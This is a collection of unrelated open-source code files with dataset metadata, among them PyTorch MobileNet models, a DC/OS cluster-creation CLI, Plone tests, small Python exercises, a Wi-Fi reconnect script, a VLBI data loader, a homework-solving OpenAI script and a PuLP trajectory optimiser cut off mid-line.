ConfigType):\n super().__init__()\n\n pretrained = config.model.mobile_net_pretrained\n if config.model.mobile_net_small:\n self.model = mobilenet_v3_small(weights=MobileNet_V3_Small_Weights.IMAGENET1K_V1 if pretrained else None)\n else:\n self.model = mobilenet_v3_large(weights=MobileNet_V3_Large_Weights.IMAGENET1K_V2 if pretrained else None)\n \n num_outputs = config.model.num_outputs\n last_layer = self.model.classifier[-1]\n if last_layer.out_features != num_outputs:\n self.model.classifier[-1] = nn.Linear(last_layer.in_features, num_outputs)\n nn.init.normal_(self.model.classifier[-1].weight, 0, 0.01)\n nn.init.zeros_(self.model.classifier[-1].bias)\n\n def forward(self, x):\n return self.model(x)\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Block(nn.Module):\n '''expand + depthwise + pointwise'''\n def __init__(self, in_planes, out_planes, expansion, stride):\n super(Block, self).__init__()\n self.stride = stride\n\n planes = expansion * in_planes\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, groups=planes, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn3 = nn.BatchNorm2d(out_planes)\n\n self.shortcut = nn.Sequential()\n if stride == 1 and in_planes != out_planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, 
bias=False),\n nn.BatchNorm2d(out_planes),\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out = out + self.shortcut(x) if self.stride==1 else out\n return out\n\n\nclass MobileNetV2(nn.Module):\n # (expansion, out_planes, num_blocks, stride)\n cfg = [(1, 16, 1, 1),\n (6, 24, 2, 1), # NOTE: change stride 2 -> 1 for CIFAR10\n (6, 32, 3, 2),\n (6, 64, 4, 2),\n (6, 96, 3, 1),\n (6, 160, 3, 2),\n (6, 320, 1, 1)]\n\n def __init__(self, config: ConfigType):\n super(MobileNetV2, self).__init__()\n # NOTE: change conv1 stride 2 -> 1 for CIFAR10\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(32)\n self.layers = self._make_layers(in_planes=32)\n self.conv2 = nn.Conv2d(320, 1280, kernel_size=1, stride=1, padding=0, bias=False)\n self.bn2 = nn.BatchNorm2d(1280)\n self.linear = nn.Linear(1280, config.model.num_outputs)\n\n def _make_layers(self, in_planes):\n layers = []\n for expansion, out_planes, num_blocks, stride in self.cfg:\n strides = [stride] + [1]*(num_blocks-1)\n for stride in strides:\n layers.append(Block(in_planes, out_planes, expansion, stride))\n in_planes = out_planes\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.layers(out)\n out = F.relu(self.bn2(self.conv2(out)))\n # NOTE: change pooling kernel_size 7 -> 4 for CIFAR10\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n","repo_name":"Kausta/R252_SAM","sub_path":"sam/models/mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"1661312729","text":"\"\"\"\nTools for creating a DC/OS cluster.\n\"\"\"\n\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Tuple\n\nimport click\nfrom docker.models.networks import Network\nfrom docker.types import Mount\n\nfrom dcos_e2e.backends import Docker\nfrom dcos_e2e.distributions import Distribution\nfrom dcos_e2e.docker_storage_drivers import DockerStorageDriver\nfrom dcos_e2e.docker_versions import DockerVersion\nfrom dcos_e2e.node import Transport\nfrom dcos_e2e_cli.common.arguments import installer_path_argument\nfrom dcos_e2e_cli.common.create import CREATE_HELP, create_cluster, get_config\nfrom dcos_e2e_cli.common.credentials import add_authorized_key\nfrom dcos_e2e_cli.common.doctor import get_doctor_message\nfrom dcos_e2e_cli.common.install import (\n cluster_install_dcos_from_path,\n run_post_install_steps,\n)\nfrom dcos_e2e_cli.common.options import (\n cluster_id_option,\n copy_to_master_option,\n enable_spinner_option,\n extra_config_option,\n license_key_option,\n security_mode_option,\n variant_option,\n verbosity_option,\n)\nfrom dcos_e2e_cli.common.options.cluster_size import (\n agents_option,\n masters_option,\n public_agents_option,\n)\nfrom dcos_e2e_cli.common.options.genconf_dir import genconf_dir_option\nfrom dcos_e2e_cli.common.utils import (\n check_cluster_id_unique,\n command_path,\n write_key_pair,\n)\nfrom dcos_e2e_cli.common.variants import get_install_variant\nfrom dcos_e2e_cli.common.workspaces import workspace_dir_option\n\nfrom ._cgroup_mount_option import cgroup_mount_option\nfrom ._common import (\n CLUSTER_ID_LABEL_KEY,\n NODE_TYPE_AGENT_LABEL_VALUE,\n NODE_TYPE_LABEL_KEY,\n NODE_TYPE_MASTER_LABEL_VALUE,\n 
NODE_TYPE_PUBLIC_AGENT_LABEL_VALUE,\n WORKSPACE_DIR_LABEL_KEY,\n ClusterContainers,\n existing_cluster_ids,\n)\nfrom ._docker_network import docker_network_option\nfrom ._docker_storage_driver import docker_storage_driver_option\nfrom ._docker_version import docker_version_option\nfrom ._linux_distribution import linux_distribution_option\nfrom ._options import node_transport_option, wait_for_dcos_option\nfrom ._port_mapping import one_master_host_port_map_option\nfrom ._volume_options import (\n AGENT_VOLUME_OPTION,\n MASTER_VOLUME_OPTION,\n PUBLIC_AGENT_VOLUME_OPTION,\n VOLUME_OPTION,\n)\nfrom .doctor import doctor\nfrom .wait import wait\n\n\n@click.command('create', help=CREATE_HELP)\n@installer_path_argument\n@docker_version_option\n@linux_distribution_option\n@docker_storage_driver_option\n@cgroup_mount_option\n@masters_option\n@agents_option\n@public_agents_option\n@extra_config_option\n@security_mode_option\n@cluster_id_option\n@license_key_option\n@genconf_dir_option\n@copy_to_master_option\n@VOLUME_OPTION\n@MASTER_VOLUME_OPTION\n@AGENT_VOLUME_OPTION\n@PUBLIC_AGENT_VOLUME_OPTION\n@workspace_dir_option\n@variant_option\n@wait_for_dcos_option\n@docker_network_option\n@node_transport_option\n@one_master_host_port_map_option\n@verbosity_option\n@enable_spinner_option\n@click.pass_context\ndef create(\n ctx: click.core.Context,\n agents: int,\n installer: Path,\n cluster_id: str,\n docker_storage_driver: Optional[DockerStorageDriver],\n docker_version: DockerVersion,\n extra_config: Dict[str, Any],\n linux_distribution: Distribution,\n masters: int,\n public_agents: int,\n license_key: Optional[Path],\n security_mode: Optional[str],\n copy_to_master: List[Tuple[Path, Path]],\n files_to_copy_to_genconf_dir: List[Tuple[Path, Path]],\n workspace_dir: Path,\n custom_volume: List[Mount],\n custom_master_volume: List[Mount],\n custom_agent_volume: List[Mount],\n custom_public_agent_volume: List[Mount],\n variant: str,\n transport: Transport,\n wait_for_dcos: bool,\n network: Network,\n one_master_host_port_map: Dict[str, int],\n mount_sys_fs_cgroup: bool,\n enable_spinner: bool,\n) -> None:\n \"\"\"\n Create a DC/OS cluster.\n \"\"\"\n check_cluster_id_unique(\n new_cluster_id=cluster_id,\n existing_cluster_ids=existing_cluster_ids(),\n )\n\n http_checks = bool(transport == Transport.SSH)\n wait_command_name = command_path(sibling_ctx=ctx, command=wait)\n doctor_command_name = command_path(sibling_ctx=ctx, command=doctor)\n doctor_message = get_doctor_message(\n doctor_command_name=doctor_command_name,\n )\n public_key_path = workspace_dir / 'id_rsa.pub'\n private_key_path = workspace_dir / 'id_rsa'\n write_key_pair(\n public_key_path=public_key_path,\n private_key_path=private_key_path,\n )\n\n dcos_variant = get_install_variant(\n given_variant=variant,\n installer_path=installer,\n workspace_dir=workspace_dir,\n doctor_message=doctor_message,\n enable_spinner=enable_spinner,\n )\n\n # This is useful for some people to identify containers.\n container_name_prefix = Docker().container_name_prefix + '-' + cluster_id\n\n cluster_backend = Docker(\n container_name_prefix=container_name_prefix,\n custom_container_mounts=custom_volume,\n custom_master_mounts=custom_master_volume,\n custom_agent_mounts=custom_agent_volume,\n custom_public_agent_mounts=custom_public_agent_volume,\n linux_distribution=linux_distribution,\n docker_version=docker_version,\n storage_driver=docker_storage_driver,\n docker_container_labels={\n CLUSTER_ID_LABEL_KEY: cluster_id,\n WORKSPACE_DIR_LABEL_KEY: 
str(workspace_dir),\n },\n docker_master_labels={\n NODE_TYPE_LABEL_KEY: NODE_TYPE_MASTER_LABEL_VALUE,\n },\n docker_agent_labels={NODE_TYPE_LABEL_KEY: NODE_TYPE_AGENT_LABEL_VALUE},\n docker_public_agent_labels={\n NODE_TYPE_LABEL_KEY: NODE_TYPE_PUBLIC_AGENT_LABEL_VALUE,\n },\n workspace_dir=workspace_dir,\n transport=transport,\n network=network,\n one_master_host_port_map=one_master_host_port_map,\n mount_sys_fs_cgroup=mount_sys_fs_cgroup,\n )\n\n cluster = create_cluster(\n cluster_backend=cluster_backend,\n masters=masters,\n agents=agents,\n public_agents=public_agents,\n doctor_message=doctor_message,\n enable_spinner=enable_spinner,\n )\n\n cluster_containers = ClusterContainers(\n cluster_id=cluster_id,\n transport=transport,\n )\n private_ssh_key_path = cluster_containers.ssh_key_path\n private_ssh_key_path.parent.mkdir(parents=True)\n private_key_path.replace(private_ssh_key_path)\n\n add_authorized_key(cluster=cluster, public_key_path=public_key_path)\n\n for node in cluster.masters:\n for path_pair in copy_to_master:\n local_path, remote_path = path_pair\n node.send_file(\n local_path=local_path,\n remote_path=remote_path,\n )\n\n dcos_config = get_config(\n cluster_representation=cluster_containers,\n extra_config=extra_config,\n dcos_variant=dcos_variant,\n security_mode=security_mode,\n license_key=license_key,\n )\n\n cluster_install_dcos_from_path(\n cluster=cluster,\n cluster_representation=cluster_containers,\n dcos_config=dcos_config,\n ip_detect_path=cluster_backend.ip_detect_path,\n doctor_message=doctor_message,\n dcos_installer=installer,\n files_to_copy_to_genconf_dir=files_to_copy_to_genconf_dir,\n enable_spinner=enable_spinner,\n )\n\n run_post_install_steps(\n cluster=cluster,\n cluster_id=cluster_id,\n dcos_config=dcos_config,\n doctor_command_name=doctor_command_name,\n http_checks=http_checks,\n wait_command_name=wait_command_name,\n wait_for_dcos=wait_for_dcos,\n enable_spinner=enable_spinner,\n )\n","repo_name":"dcos/dcos-e2e","sub_path":"src/dcos_e2e_cli/dcos_docker/commands/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":7721,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"41483658470","text":"from datetime import datetime\n\n\ndef voto(id = 0):\n idade = datetime.now().year - id\n if idade < 16 or idade > 65:\n valor = 'Não vota'\n return idade, valor\n elif idade >= 16 and idade < 18:\n valor = 'Voto Opcional'\n return idade, valor\n elif idade >= 18 or idade < 65:\n valor = 'Voto Obrigatorio'\n return idade, valor\n\n\nprint('-'*40)\nano = int(input('digite seu ano de nascimento: '))\nprint(f'Com idade {voto(ano)[0]}: {voto(ano)[1]}')\n","repo_name":"Nathan120/Arq_Python_CursoEmVideo","sub_path":"Curso_Gustavo_Guanabara/Exercicio101.py","file_name":"Exercicio101.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73295381561","text":"#https://leetcode.com/problems/median-of-two-sorted-arrays/description/\nclass Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n nums3 = []\n lena = len(nums1) +len(nums2)\n nums3 = nums1+nums2\n nums3.sort()\n half = (lena//2)-1\n if (lena % 2 ==0):\n median = (nums3[half]+nums3[half+1])/2\n print(nums3[half],nums3[half+1])\n else:\n median = nums3[lena//2]\n print(nums3,half,lena)\n return 
median","repo_name":"BhanuKedhar09/Problems","sub_path":"Problem_Solving/Median_of_Two_Sorted_Arrays.py","file_name":"Median_of_Two_Sorted_Arrays.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34009646713","text":"from Seq1 import Seq\n\nprint(\"-----| Practice 1, Exercise 10 |------\")\n\ngene_list =[\"U5\", \"ADA\", \"FRAT1\", \"FXN\", \"RNU6_269P\" ]\nfolder = \"../Session-04/\"\n\nfor gene in gene_list:\n file = folder + gene + \".txt\"\n sequence = Seq()\n sequence.read_fasta(file)\n A, C, T, G = Seq.count_base(sequence)\n max_base = max([A, C, T, G])\n nucleotides_dict = {\"A\": A, \"C\": C, \"T\": T, \"G\": G}\n for k, v in nucleotides_dict.items():\n if v == max_base:\n print(f\"Gene {gene}: Most frequent base: {k}\")\n","repo_name":"JavierSequeiro/PROGRAMMING-IN-NETWORK-ENVIRONMENTS","sub_path":"P1/Ex10.py","file_name":"Ex10.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22279073188","text":"from Products.CMFCore.utils import getToolByName\nfrom santa.templates.tests.base import IntegrationTestCase\n\n\nclass TestCase(IntegrationTestCase):\n \"\"\"TestCase for Plone setup.\"\"\"\n\n def setUp(self):\n self.portal = self.layer['portal']\n\n def test_is_santa_templates_installed(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n self.failUnless(installer.isProductInstalled('santa.templates'))\n\n def test_is_santa_content_installed(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n self.failUnless(installer.isProductInstalled('santa.content'))\n\n def test_is_collective_contentleadimage_installed(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n self.failUnless(installer.isProductInstalled('collective.contentleadimage'))\n\n def test_is_PloneFormGen_installed(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n self.failUnless(installer.isProductInstalled('PloneFormGen'))\n\n def test_browserlayer(self):\n from santa.templates.browser.interfaces import ISantaTemplatesLayer\n from plone.browserlayer import utils\n self.failUnless(ISantaTemplatesLayer in utils.registered_layers())\n\n def test_metadata__version(self):\n setup = getToolByName(self.portal, 'portal_setup')\n self.assertEqual(\n setup.getVersionForProfile('profile-santa.templates:default'),\n u'1')\n\n def test__cli_properties(self):\n portal_properties = getToolByName(self.portal, 'portal_properties')\n cli_properties = getattr(portal_properties, 'cli_properties')\n self.assertEqual(\n cli_properties.getProperty('allowed_types'),\n ('Event', 'FormFolder'))\n\n def test_viewlets__santa_top_manager(self):\n from zope.component import getUtility\n from plone.app.viewletmanager.interfaces import IViewletSettingsStorage\n storage = getUtility(IViewletSettingsStorage)\n self.assertEqual(\n storage.getOrder('santa.top.manager', '*'),\n (\n u'santa.viewlet.about',\n u'santa.viewlet.news',\n u'santa.viewlet.comingevents',\n u'santa.viewlet.latestevents',\n u'santa.viewlet.partners',\n u'santa.viewlet.cases',\n ))\n\n def test_viewlets__santa_folder_manager(self):\n from zope.component import getUtility\n from plone.app.viewletmanager.interfaces import IViewletSettingsStorage\n storage = getUtility(IViewletSettingsStorage)\n self.assertEqual(\n storage.getOrder('santa.folder.manager', '*'),\n (\n u'santa.viewlet.folder',\n 
)\n        )\n\n    def test_uninstall__package(self):\n        installer = getToolByName(self.portal, 'portal_quickinstaller')\n        installer.uninstallProducts(['santa.templates'])\n        self.failIf(installer.isProductInstalled('santa.templates'))\n\n    def test_uninstall__browserlayer(self):\n        installer = getToolByName(self.portal, 'portal_quickinstaller')\n        installer.uninstallProducts(['santa.templates'])\n        from santa.templates.browser.interfaces import ISantaTemplatesLayer\n        from plone.browserlayer import utils\n        self.failIf(ISantaTemplatesLayer in utils.registered_layers())\n","repo_name":"taito-zz/santa.templates","sub_path":"src/santa/templates/tests/test_setup.py","file_name":"test_setup.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"34772460861","text":"import time\r\n\r\n\r\ndef make_file_copy(file_to_copy):\r\n    f_contents = ''\r\n    with open(file_to_copy, 'r') as orig_file:\r\n        f_contents = orig_file.read()  # dump the contents\r\n\r\n    with open(f'copy_of_{file_to_copy.replace(\".txt\", \"\")}_{time.time()}.txt', 'w') as copy:\r\n        copy.write(f_contents)  # write the contents into new file\r\n\r\n\r\nif __name__ == '__main__':\r\n    make_file_copy('file.txt')\r\n","repo_name":"srinivas-kini/pypractice","sub_path":"practice/mk_file_cpy.py","file_name":"mk_file_cpy.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"17568606213","text":"# coding=utf-8\n\nimport os\nimport time\nimport login\n\ndef PingTest():\n    err = os.system('ping -4 -n 1 www.baidu.com')\n    if err:\n        return False\n    else:\n        return True\n\nflag = False\n\nwhile True:\n    if PingTest():\n        flag = False\n    else:\n        if flag:\n            print('Disconnecting...')\n            os.system('netsh wlan disconnect')\n            time.sleep(5)\n            print('Trying to reconnect...')\n            err = os.system('netsh wlan connect name=seu-wlan')\n            if not err:\n                time.sleep(30)\n                print('Logging in...')\n                login.login()\n        else:\n            print('Network problem detected')\n            flag = True\n    time.sleep(60)","repo_name":"NN708/seu-wlan-login","sub_path":"Python/auto-reconnect-win.py","file_name":"auto-reconnect-win.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"40"}
+{"seq_id":"6081996856","text":"# coding: utf-8\n\n# --------------------------------------------------------------------------\n# --------------------------------------------------------------------------\n# Template.py\n# Version: 0.2\n# Date: 8/22/2023\n# Original Author: Kyle Smiley\n# --------------------------------------------------------------------------\n# --------------------------------------------------------------------------\n#\n# This code will read and copy parcels tables to a file gdb for each.\n\n#Do the same, but for tables\n# Edit code to exclude the Logfile and rename with same name as Parcels features.\n\n# Import libraries\nimport arcpy\nimport os\n\n#Set workspace and parameters\narcpy.env.overwriteOutput = True\nworkspace = arcpy.GetParameterAsText(0) # DataType = folder\noutgdb = arcpy.GetParameterAsText(1) # DataType = workspace\n\n# Copy the tables to the gdb\nwalk = arcpy.da.Walk(workspace, datatype = \"Table\")\nfor dirpath, dirnames, filenames in walk:\n    for file in filenames:\n        if file.startswith(\"Logfile\"):\n            continue\n        intable = os.path.join(dirpath, file)\n        outtableName = \"Parcels\" + \"_\" + os.path.basename(dirpath) + \"Table\"\n        outtable = os.path.join(outgdb, 
outtableName)\n arcpy.management.CopyRows(intable, outtable)\n\n","repo_name":"ksmiley92/MyScripts","sub_path":"CopyParcelsTablesToGDB.py","file_name":"CopyParcelsTablesToGDB.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15375640047","text":"import os\nfrom functools import lru_cache\n\nimport numpy as np\nimport resolve as rve\nimport pandas as pd\n\nimport fnmatch\n\nfrom .utilities import get_files_in_folder\nfrom .load_via_ehtim import load_uvfits\n\n\ndef filter_files(directory, file_filter):\n files = get_files_in_folder(directory)\n if file_filter is not None:\n direc = os.path.split(files[0])[0]\n files = [os.path.split(ff)[1] for ff in files]\n files = fnmatch.filter(files, file_filter)\n files = [os.path.join(direc, ff) for ff in files]\n return files\n\n@lru_cache(maxsize=None) \ndef load_observations(*,file_filter, minimum_antenna_distance,\n minimum_number_of_data_points_in_time_averaging_bin, load_polarization, directory,\n gap_time_for_averaging, **kwargs):\n double_precision = True\n files = filter_files(directory, file_filter)\n\n obs0 = []\n for ff in files:\n if os.path.splitext(ff)[1] == \".uvfits\" or os.path.splitext(ff)[1] == \".uvf\":\n obs0.append(load_uvfits(ff, load_polarization))\n elif os.path.splitext(ff)[1] == \".npz\":\n obs0.append(rve.Observation.load(ff))\n else:\n raise RuntimeError(f\"File format not known: {ff}\")\n\n obs = []\n\n for oo in obs0:\n # Flag short baselines\n min_dist = minimum_antenna_distance\n if min_dist is not None:\n coords = oo.auxiliary_table(\"ANTENNA\")[\"POSITION\"]\n for ant1 in range(coords.shape[0]):\n for ant2 in range(ant1, coords.shape[0]):\n dist = np.linalg.norm(coords[ant1] - coords[ant2])\n if dist < min_dist:\n oo = oo.flag_baseline(ant1, ant2)\n # /Flag short baselines\n\n # Prune empty rows\n oo = oo[~np.any(oo.weight.val == 0., (0,2))]\n\n assert np.all(oo.weight.val > 0.)\n # /Prune empty rows\n\n # Average scans\n ts_per_bin = minimum_number_of_data_points_in_time_averaging_bin\n gap_time = gap_time_for_averaging\n list_of_timebins = rve.fair_share_averaging(ts_per_bin, oo.time, gap_time)\n oo = oo.time_average(list_of_timebins)\n # /Average scans\n\n ind = np.lexsort((oo.ant2, oo.ant1, oo.time))\n oo = oo[ind]\n if double_precision:\n oo = oo.to_double_precision()\n obs.append(oo)\n return tuple(obs)\n\ndef load_alma_lightcurves(*, directory, folder, day, **kwargs):\n full_dir = os.path.join(directory, folder)\n files = filter_files(full_dir, f\"ALMA_lc_hi_{day}.h5\")\n dfs = []\n for f in files:\n df = pd.read_hdf(f, key='data')\n dfs.append(df)\n return dfs\n \n\n\n\n","repo_name":"jknollm/VLBI_Resolve_EHT_SgrA","sub_path":"src/data_loading.py","file_name":"data_loading.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69844585080","text":"import openai\nfrom docx import Document\nfrom docx.shared import Inches\nimport pywhatkit as pw\nfrom PyPDF2 import PdfReader\nfrom apikey import APIKEY\nopenai.api_key = APIKEY\n\nreader = PdfReader('DA.pdf')\n \n# printing number of pages in pdf file\n \n# getting a specific page from the pdf file\npage = reader.pages[0]\nuserName = input(\"Enter your name: \")\nuserRegNo = input(\"Enter your registration number: \")\n# extracting text from page\n\ninput2GPT = \"My name is \"+ userName + \". My registration number is \"+ userRegNo + \". Below is my homework. 
Put my name and registration number at the top of the assignment and solve it. \\n \" + page.extract_text()\n\noutput = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\", \n messages=[{\"role\": \"user\", \"content\": \n input2GPT}]\n )\n\noutputGPT = output['choices'][0]['message']['content']\nprint(\"DA executed successfully. Check \")\n\ndocument = Document()\np = document.add_paragraph(outputGPT)\ndocument.add_page_break()\n\ndocument.save(userName + userRegNo + '_DA' +'.docx')\n","repo_name":"angeryrohan/Dobby","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18975685876","text":"\ndef calc_Conv(k,z, nr_k):\n parameters = (((k**2)*z)+1)*nr_k\n return parameters\ndef calc_fully(c,p):\n parameters = (c*p)+(1*c)\n return parameters\n\ndef calc_output():\n pass\n\n#input\nx1 = 25\ny1 = 25\nz1 = 3\n#filter/kernel\nk1=3\nstride = 2\nnmbr_k = 14\npad=1\n\n#conv size\n#13x13x14\nconv_size = ((x1-k1+(2*pad))/stride)+1\n#maxpoolsize\n#12x12x14\np_size = ((13-2)/1)+1\n# fully connected layer\nFC = 15\n# output\nOut = 10\nFc_size = ((x1-k1+(2*pad))/stride)+1\n\nconv1 = calc_Conv(k1,z1,nmbr_k)\nprint(conv1)\ns = 12*14*14\ns1 = 15\nfully_c = calc_fully(s1, s)\nprint(fully_c)\ns2 = 10\nfully_c2 = calc_fully(s2, s1)\nprint(fully_c2)\n\n","repo_name":"nicoleadamah/Neural-Networks-FFR135","sub_path":"Neural Networks - FFR135/Homework 3/CNN parameters/Parameters.py","file_name":"Parameters.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1306047034","text":"import numpy as np\nimport pulp\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\n\ndef lpAffExpAsTuple(ee):\n return tuple([(v[0].name,v[1]) for v in ee.items()])\n\ndef oppositeLpExpAsTuple(ee):\n return tuple([(v[0].name,-v[1]) for v in ee.items()])\n\ndef lpConstraintsOppose(e1,e2):\n return lpAffExpAsTuple(e1)==oppositeLpExpAsTuple(e2)\n\ndef pointsOnHemisphere(Nel,Naz):\n M = np.transpose(np.vstack((np.cos(np.pi*np.array(range(Naz))/Naz),np.sin(np.pi*np.array(range(Naz))/Naz))))\n el_range=np.array(range((1-Nel),Nel))*0.5*np.pi/Nel\n el_range=np.reshape(el_range,(2*Nel-1,1))\n M2 = np.kron(np.cos(el_range),M)\n M3 = np.kron(np.sin(el_range),np.ones((Naz,1)))\n M4 = np.hstack((M2,M3))\n M5 = np.vstack((np.array([0,0,1]),M4))\n return(M5)\n\ndef testHemisphere(Nel=10,Naz=10):\n M = pointsOnHemisphere(Nel,Naz)\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ax.scatter(M[:,0],M[:,1],M[:,2])\n plt.show()\n\nclass LpProbVectors(pulp.LpProblem):\n\n def __init__(self,name=\"NoName\",sense=1):\n # initialize parent Pulp class\n pulp.LpProblem.__init__(self, name, sense)\n self.leq_list = []\n self.contradictory = False\n\n def newVarVector(self,name,num_elems):\n v = []\n for ii in range(num_elems):\n newvar = pulp.LpVariable(\"%s_%i\" % (name,ii))\n v.append(newvar)\n self.addVariable(newvar)\n return v\n\n def addVecEqualZeroConstraint(self,vector_expression,name=None):\n for ii,ee in enumerate(vector_expression):\n if name is not None:\n loc_name = \"%s_%i\" % (name,ii)\n else:\n loc_name = None\n self.addConstraint(ee==0.0,name=loc_name)\n\n def addLeqZeroConstraint(self,ee):\n # capture this for quick feasibility checking\n # add it as a constraint in usual way\n self.addConstraint(ee<=0.0)\n # extract opposing constants\n opp_consts = [c.constant 
for c in self.leq_list if lpConstraintsOppose(ee,c)]\n # check if present\n if len(opp_consts)>0:\n max_opp_const = np.max(opp_consts)\n if max_opp_const > -ee.constant:\n self.contradictory = True\n # add new expression to the list\n self.leq_list += [ee]\n\n def addVecLessEqZeroConstraint(self,vector_expression):\n for ee in vector_expression:\n self.addLeqZeroConstraint(ee)\n\n def addMaxVarConstraint(self,vector_expression):\n # adds decision variable to grab max(e)\n newvar = pulp.LpVariable(\"_max%i\" % (self.numVariables()+1))\n for ee in vector_expression:\n self.addConstraint(ee-newvar<=0.0)\n return newvar\n\n def vectorValue(self,vector_expression):\n v = []\n for ee in vector_expression:\n v.append(ee.value())\n return np.array(v)\n\nclass LTraj(LpProbVectors):\n\n def __init__(self,A,B,Nt,name=\"NoName\",sense=1,num_agents=1):\n # initialize parent Pulp class\n LpProbVectors.__init__(self, name, sense)\n # begin with no objective at all\n self+=0.0\n # check size compatibility\n assert A.shape[1]==A.shape[0], \"A must be square\"\n assert B.shape[0]==A.shape[0], \"B must have same row count as A\"\n # store horizon\n self.Nt = Nt\n self.num_agents = num_agents\n self.num_states = num_agents*A.shape[0]\n self.num_inputs = num_agents*B.shape[1]\n self.var_x = [[] for kk in range(self.Nt+1)]\n self.var_u = [[] for kk in range(self.Nt)]\n self.avar_x = []\n self.avar_u = []\n for aa in range(num_agents):\n # set up state and input variables\n self.avar_x.append([self.newVarVector(\"x%i(0)\" % (aa+1),A.shape[0])])\n self.var_x[0].extend(self.avar_x[aa][0])\n self.avar_u.append([])\n for kk in range(self.Nt):\n self.avar_x[aa].append(self.newVarVector(\"x%i(%i)\" % (aa+1,kk+1),A.shape[0]))\n self.avar_u[aa].append(self.newVarVector(\"u%i(%i)\" % (aa+1,kk),B.shape[1]))\n self.addVecEqualZeroConstraint(np.dot(np.array(A),self.avar_x[aa][kk])+np.dot(np.array(B),self.avar_u[aa][kk]) - self.avar_x[aa][kk+1])\n self.var_x[kk+1].extend(self.avar_x[aa][kk+1])\n self.var_u[kk].extend(self.avar_u[aa][kk])\n\n\n def setInitialState(self,x0):\n self.addVecEqualZeroConstraint(self.var_x[0]-np.array(x0),name='xinit')\n self.init_x = x0\n\n def changeInitState(self,x0):\n assert len(x0)==self.num_states\n self.init_x = x0\n for ii in range(self.num_states):\n self.constraints[(\"xinit_%i\" % ii)].changeRHS(x0[ii])\n\n def setTerminalState(self,xN):\n self.addVecEqualZeroConstraint(self.var_x[self.Nt]-np.array(xN),name='xterm')\n self.term_x = xN\n\n def changeTermState(self,xN):\n assert len(xN)==self.num_states\n self.term_x = xN\n for ii in range(self.num_states):\n self.constraints[(\"xterm_%i\" % ii)].changeRHS(xN[ii])\n\n def addInfNormStageCost(self,E,F, agent='aug'):\n # adds sum_k ||Ex(k)+Fu(k)||_inf to cost\n for kk in range(self.Nt):\n if agent=='aug':\n newvar=self.addMaxVarConstraint(\n np.hstack((\n np.dot(np.array(E), self.var_x[kk])+np.dot(np.array(F), self.var_u[kk]),\n np.dot(-np.array(E), self.var_x[kk])+np.dot(-np.array(F), self.var_u[kk])\n ))\n )\n self.objective += newvar\n elif agent in range(self.num_agents):\n newvar=self.addMaxVarConstraint(\n np.hstack((\n np.dot(np.array(E), self.avar_x[agent][kk])+np.dot(np.array(F), self.avar_u[agent][kk]),\n np.dot(-np.array(E), self.avar_x[agent][kk])+np.dot(-np.array(F), self.avar_u[agent][kk])\n ))\n )\n self.objective += newvar\n elif agent=='all':\n for aa in range(self.num_agents):\n newvar=self.addMaxVarConstraint(\n np.hstack((\n np.dot(np.array(E), self.avar_x[aa][kk])+np.dot(np.array(F), self.avar_u[aa][kk]),\n 
